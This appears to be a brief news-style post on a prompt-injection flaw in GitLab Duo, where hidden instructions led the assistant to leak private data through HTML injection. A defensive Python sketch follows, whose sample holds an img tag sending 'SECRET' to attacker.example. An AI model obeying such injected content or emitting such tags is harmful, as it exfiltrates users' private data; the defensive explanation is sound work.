

GitLab Duo, the AI assistant riding on Anthropic’s Claude, stumbled into a prompt injection blunder. Sneaky instructions hidden in project content let attackers trick Duo into swiping private data. The culprit? Streaming markdown teamed up with shoddy sanitization, which opened the door to HTML injection and shone a spotlight on the double-edged sword of AI assistants: useful, but also a tad too exploitable. GitLab scrambled to patch these loopholes, but the episode serves as a stark reminder: AI assistants need a fortress against crafty tampering.
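To see why streaming and sanitization can be a risky mix, here is a minimal, hypothetical Python sketch. It is not GitLab's code and does not reproduce the actual flaw. It only assumes a renderer that filters each streamed chunk on its own. A pattern-based filter that strips complete `<...>` tags misses a tag that happens to be split across two chunks, while character-level escaping with the standard library's `html.escape` gives the same result however the stream is chunked. The function names and the attacker URL are made up for illustration.

```python
import html
import re

# Naive filter (hypothetical): remove anything that looks like a complete HTML tag.
TAG_RE = re.compile(r"<[^>]*>")


def strip_tags_per_chunk(chunks):
    """Apply the regex filter to each streamed chunk independently (unsafe)."""
    return "".join(TAG_RE.sub("", c) for c in chunks)


def escape_per_chunk(chunks):
    """Escape HTML metacharacters in each chunk.

    Escaping works character by character, so a tag split across chunk
    boundaries is still neutralized.
    """
    return "".join(html.escape(c) for c in chunks)


# Hypothetical model output: an injected <img> tag split across two chunks.
chunks = ["Here is the summary <im", "g src=https://attacker.example/?d=SECRET>"]

print(strip_tags_per_chunk(chunks))  # the <img ...> tag survives intact
print(escape_per_chunk(chunks))      # the tag is rendered as inert text
```

Escaping everything also disables any HTML that markdown would otherwise allow. A real renderer would more likely wait for a complete block, render it, and pass the resulting HTML through an allowlist sanitizer. The sketch only shows why filtering chunk by chunk with patterns is fragile.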
